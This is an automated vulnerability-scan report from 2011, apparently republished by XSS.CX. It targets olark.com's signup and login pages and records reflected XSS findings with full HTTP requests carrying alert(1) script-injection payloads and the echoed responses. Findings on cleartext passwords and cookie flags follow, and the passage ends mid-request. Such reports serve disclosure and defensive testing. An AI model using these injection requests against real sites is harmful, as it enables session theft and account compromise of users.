XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, olark.com

Report generated by XSS.CX at Sat Jun 04 18:24:05 CDT 2011.


Contents

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.olark.com/signup/create_new_account [user%5Bemail%5D parameter]

1.2. http://www.olark.com/signup/create_new_account [user%5Bemail%5D parameter]

1.3. http://www.olark.com/signup/create_new_account [user%5Bemail%5D parameter]

1.4. http://www.olark.com/signup/create_new_account [user%5Busername%5D parameter]

2. Cleartext submission of password

2.1. http://www.olark.com/account/login

2.2. http://www.olark.com/signup/create_new_account

3. Cookie without HttpOnly flag set

3.1. http://www.olark.com/about

3.2. http://www.olark.com/account/login

3.3. http://www.olark.com/features

3.4. http://www.olark.com/plans

3.5. http://www.olark.com/signup/create_new_account

4. Password field with autocomplete enabled

4.1. http://www.olark.com/account/login

4.2. http://www.olark.com/signup/create_new_account

5. Email addresses disclosed

6. Social security numbers disclosed

6.1. http://www.olark.com/about

6.2. http://www.olark.com/account/login

6.3. http://www.olark.com/assets/common.js

6.4. http://www.olark.com/features

6.5. http://www.olark.com/plans

6.6. http://www.olark.com/signup/create_new_account

6.7. http://www.olark.com/stylesheets/compiled/print.css

6.8. http://www.olark.com/stylesheets/compiled/screen.css

7. Content type is not specified

7.1. http://www.olark.com/assets/common.js

7.2. http://www.olark.com/stylesheets/compiled/print.css

7.3. http://www.olark.com/stylesheets/compiled/screen.css



1. Cross-site scripting (reflected)  next
There are 4 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.olark.com/signup/create_new_account [user%5Bemail%5D parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The value of the user%5Bemail%5D request parameter is copied into the HTML document as plain text between tags. The payload 5ee3b<script>alert(1)</script>0a7ac62aacabee5f5 was submitted in the user%5Bemail%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup/create_new_account?user%5Busername%5D=&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E5ee3b<script>alert(1)</script>0a7ac62aacabee5f5&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account
Cache-Control: max-age=0
Origin: http://www.olark.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; _habla_session_id=9b8aa26cedfb56e5f9a46067cee91843; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1553727:2592000; __utmz=1.1307223787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.363899324.1307223787.1307223787.1307223787.1; __utmc=1; __utmb=1.1.10.1307223787; olarkld=1307223735932; _oklv=1307223786621; km_vs=1; km_lv=1307223788; km_uq=; __ar_v4=ZNKDW6EP2FASLMH6RLLWY3%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A5%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A6%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A6

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:54:39 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "920efee028f097fd73f515f7940b6506"
X-Runtime: 158
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 23004
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAe51c2VyJTVCdXNlcm5hbWUlNUQ9JnVzZXIlNUJl%0AbWFpbCU1RD0lMjclMjItLSUzRSUzQyUyRnN0eWxlJTNFJTNDJTJGc2NyaXB0%0AJTNFJTNDc2NyaXB0JTNFYWxlcnQlMjgweDAwMDA0MiUyOSUzQyUyRnNjcmlw%0AdCUzRTVlZTNiPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjBhN2FjNjJhYWNh%0AYmVlNWY1JnVzZXIlNUJwYXNzd29yZCU1RD0mdXNlciU1QnBhc3N3b3JkX2Nv%0AbmZpcm1hdGlvbiU1RD0mY29tbWl0PUNvbnRpbnVlOhhtaXhwYW5lbF9wcm9w%0AZXJ0aWVzewg6FmZ1bGxzY3JlZW5fbGF5b3V0VDoJdGVzdCIYdGVzdDE6IGxl%0Ac3MgZGV0YWlsczoRdGVzdGltb25pYWxzVDoUcG9zdF9zaWdudXBfdXJsIito%0AdHRwOi8vd3d3Lm9sYXJrLmNvbS9zaWdudXAvYWZ0ZXJwbGFuczoRaHR0cF9y%0AZWZlcmVyIjNodHRwOi8vd3d3Lm9sYXJrLmNvbS9zaWdudXAvY3JlYXRlX25l%0Ad19hY2NvdW50OhVzcHJlZWRseV9wbGFuX2lkMA%3D%3D%0A; path=/
Set-Cookie: _habla_session_id=e4557d26cea4513cbae7a1746a27fbac; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
</script>5ee3b<script>alert(1)</script>0a7ac62aacabee5f5" name="user[username]">
...[SNIP]...

1.2. http://www.olark.com/signup/create_new_account [user%5Bemail%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The value of the user%5Bemail%5D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44466"%3balert(1)//40ad261698f was submitted in the user%5Bemail%5D parameter. This input was echoed as 44466";alert(1)//40ad261698f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /signup/create_new_account HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account
Content-Length: 191
Cache-Control: max-age=0
Origin: http://www.olark.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; _habla_session_id=9b8aa26cedfb56e5f9a46067cee91843; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1553727:2592000; __utmz=1.1307223787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.363899324.1307223787.1307223787.1307223787.1; __utmc=1; __utmb=1.1.10.1307223787; olarkld=1307223735932; _oklv=1307223786621; km_vs=1; km_lv=1307223788; km_uq=; __ar_v4=ZNKDW6EP2FASLMH6RLLWY3%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A5%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A6%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A6

user%5Busername%5D=&user%5Bemail%5D=44466"%3balert(1)//40ad261698f&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:54:32 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "003fbc8753613adc3046d42f9c92f15d"
X-Runtime: 282
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 23413
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiADoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6EWh0dHBfcmVmZXJlciIzaHR0cDov%0AL3d3dy5vbGFyay5jb20vc2lnbnVwL2NyZWF0ZV9uZXdfYWNjb3VudDoVc3By%0AZWVkbHlfcGxhbl9pZDA%3D%0A; path=/
Set-Cookie: _habla_session_id=e9a9c241ac94dac4dc3e24284c3d4158; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<script>var hbl_to_set_username="44466";alert(1)//40ad261698f";</script>
...[SNIP]...

1.3. http://www.olark.com/signup/create_new_account [user%5Bemail%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The value of the user%5Bemail%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f59d"><script>alert(1)</script>cd3e935a581839b5b was submitted in the user%5Bemail%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup/create_new_account?user%5Busername%5D=&user%5Bemail%5D=3f59d"><script>alert(1)</script>cd3e935a581839b5b&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account
Cache-Control: max-age=0
Origin: http://www.olark.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; _habla_session_id=9b8aa26cedfb56e5f9a46067cee91843; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1553727:2592000; __utmz=1.1307223787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.363899324.1307223787.1307223787.1307223787.1; __utmc=1; __utmb=1.1.10.1307223787; olarkld=1307223735932; _oklv=1307223786621; km_vs=1; km_lv=1307223788; km_uq=; __ar_v4=ZNKDW6EP2FASLMH6RLLWY3%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A5%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A6%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A6

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:54:29 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "f99b1c2dbb830ba4a63304d771e5d3f2"
X-Runtime: 160
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 22952
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAZp1c2VyJTVCdXNlcm5hbWUlNUQ9JnVzZXIlNUJl%0AbWFpbCU1RD0zZjU5ZCI%2BPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmNkM2U5%0AMzVhNTgxODM5YjViJnVzZXIlNUJwYXNzd29yZCU1RD0mdXNlciU1QnBhc3N3%0Ab3JkX2NvbmZpcm1hdGlvbiU1RD0mY29tbWl0PUNvbnRpbnVlOhhtaXhwYW5l%0AbF9wcm9wZXJ0aWVzewg6FmZ1bGxzY3JlZW5fbGF5b3V0VDoJdGVzdCIYdGVz%0AdDE6IGxlc3MgZGV0YWlsczoRdGVzdGltb25pYWxzVDoUcG9zdF9zaWdudXBf%0AdXJsIitodHRwOi8vd3d3Lm9sYXJrLmNvbS9zaWdudXAvYWZ0ZXJwbGFuczoR%0AaHR0cF9yZWZlcmVyIjNodHRwOi8vd3d3Lm9sYXJrLmNvbS9zaWdudXAvY3Jl%0AYXRlX25ld19hY2NvdW50OhVzcHJlZWRseV9wbGFuX2lkMA%3D%3D%0A; path=/
Set-Cookie: _habla_session_id=c475c8f6bc54194d67f63fec0fa72d90; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<input type="text" value="3f59d"><script>alert(1)</script>cd3e935a581839b5b" name="user[username]">
...[SNIP]...

1.4. http://www.olark.com/signup/create_new_account [user%5Busername%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The value of the user%5Busername%5D request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b89a"><script>alert(1)</script>45e8436854bbf5511 was submitted in the user%5Busername%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup/create_new_account?user%5Busername%5D=4b89a"><script>alert(1)</script>45e8436854bbf5511&user%5Bemail%5D=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000042%29%3C%2Fscript%3E&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&commit=Continue HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
Referer: http://www.olark.com/signup/create_new_account
Cache-Control: max-age=0
Origin: http://www.olark.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; rack_session=BAh7CzoecXVlcnlfc3RyaW5nX2Zvcl9zcHJlZWRseSIAOg5pcGFkZHJlc3Mi%0AFDE3My4xOTMuMjE0LjI0MzoYbWl4cGFuZWxfcHJvcGVydGllc3sIOhZmdWxs%0Ac2NyZWVuX2xheW91dFQ6CXRlc3QiGHRlc3QxOiBsZXNzIGRldGFpbHM6EXRl%0Ac3RpbW9uaWFsc1Q6FHBvc3Rfc2lnbnVwX3VybCIraHR0cDovL3d3dy5vbGFy%0Aay5jb20vc2lnbnVwL2FmdGVycGxhbnM6FXNwcmVlZGx5X3BsYW5faWQwOhFo%0AdHRwX3JlZmVyZXIw%0A; _habla_session_id=9b8aa26cedfb56e5f9a46067cee91843; __utmx=220293574.00012337193820629337:1:1; __utmxx=220293574.00012337193820629337:1553727:2592000; __utmz=1.1307223787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.363899324.1307223787.1307223787.1307223787.1; __utmc=1; __utmb=1.1.10.1307223787; olarkld=1307223735932; _oklv=1307223786621; km_vs=1; km_lv=1307223788; km_uq=; __ar_v4=ZNKDW6EP2FASLMH6RLLWY3%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A5%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A6%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A6

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:54:23 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "c26169d7ee62a391fb1165c6e0223605"
X-Runtime: 130
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 23006
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7CzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6HnF1ZXJ5X3N0cmlu%0AZ19mb3Jfc3ByZWVkbHkiAfB1c2VyJTVCdXNlcm5hbWUlNUQ9NGI4OWEiPjxz%0AY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD40NWU4NDM2ODU0YmJmNTUxMSZ1c2Vy%0AJTVCZW1haWwlNUQ9JTI3JTIyLS0lM0UlM0MlMkZzdHlsZSUzRSUzQyUyRnNj%0AcmlwdCUzRSUzQ3NjcmlwdCUzRWFsZXJ0JTI4MHgwMDAwNDIlMjklM0MlMkZz%0AY3JpcHQlM0UmdXNlciU1QnBhc3N3b3JkJTVEPSZ1c2VyJTVCcGFzc3dvcmRf%0AY29uZmlybWF0aW9uJTVEPSZjb21taXQ9Q29udGludWU6GG1peHBhbmVsX3By%0Ab3BlcnRpZXN7CDoWZnVsbHNjcmVlbl9sYXlvdXRUOgl0ZXN0Ihh0ZXN0MTog%0AbGVzcyBkZXRhaWxzOhF0ZXN0aW1vbmlhbHNUOhRwb3N0X3NpZ251cF91cmwi%0AK2h0dHA6Ly93d3cub2xhcmsuY29tL3NpZ251cC9hZnRlcnBsYW5zOhFodHRw%0AX3JlZmVyZXIiM2h0dHA6Ly93d3cub2xhcmsuY29tL3NpZ251cC9jcmVhdGVf%0AbmV3X2FjY291bnQ6FXNwcmVlZGx5X3BsYW5faWQw%0A; path=/
Set-Cookie: _habla_session_id=2c065968644259ccaf41455e9dac3c86; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<input type="text" value="4b89a"><script>alert(1)</script>45e8436854bbf5511" name="user[email]">
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 2 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.olark.com/account/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.olark.com
Path:   /account/login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /account/login HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=7967ed3c59ef93e0a9e522d7696d3419; wcsid=RH7FRET5KH7FRAB2T75YXWVN93534311; hblid=XGCFYGW2E9P0F80O6D3MEV3193534311; olark_referrer=(Direct); __utmz=1.1307223738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); km_ai=Y8WuMkTtR3KKkCr5oWZY4tS0b10; km_abi=Y8WuMkTtR3KKkCr5oWZY4tS0b10; __ar_v4=%7CHYX6JMFHEBBHJEIEFT5BJD%3A20110604%3A1%7CBP2WER5KN5CGFOUBWKGVKX%3A20110604%3A1%7CVURWVKXLHNCPPKGJTVXL6W%3A20110604%3A1; km_vs=1; km_lv=1307223777; km_uq=; rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; _habla_session_id=8176dac3446661bf1abbb4cfa5ec84aa; olarkld=1307223735932; _oklv=1307223779753; __utma=1.582467809.1307223738.1307223738.1307223738.1; __utmc=1; __utmb=1.4.10.1307223738

Response

HTTP/1.1 200 OK
Date: Sat, 04 Jun 2011 21:43:00 GMT
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4 PHP/5.2.10-2ubuntu6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8o
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
ETag: "8cd3f804092786bb7afdfae4208d3d52"
X-Runtime: 13
Cache-Control: private, max-age=0, must-revalidate
Status: 200
Vary: Accept-Encoding,User-Agent
Content-Length: 11776
Content-Type: text/html; charset=utf-8
Set-Cookie: rack_session=BAh7BzoOaXBhZGRyZXNzIhQxNzMuMTkzLjIxNC4yNDM6EWh0dHBfcmVmZXJl%0AcjA%3D%0A; path=/
Set-Cookie: _habla_session_id=9f66e9a875d9b5043a20f0c3ecd19c68; path=/
Via: 1.1 web2.local

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type='text/javascript'>
//<![CDATA[

...[SNIP]...
<div class='prepend-2 span-9 colborder'>
<form action="login" id="loginform" method="post">
<ul class='label-left half_width'>
...[SNIP]...
</label>
<input id="password" name="password" type="password" />
<input id="old" name="old" type="hidden" />
...[SNIP]...

2.2. http://www.olark.com/signup/create_new_account  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.olark.com
Path:   /signup/create_new_account

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /signup/create_new_account HTTP/1.1
Host: www.olark.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
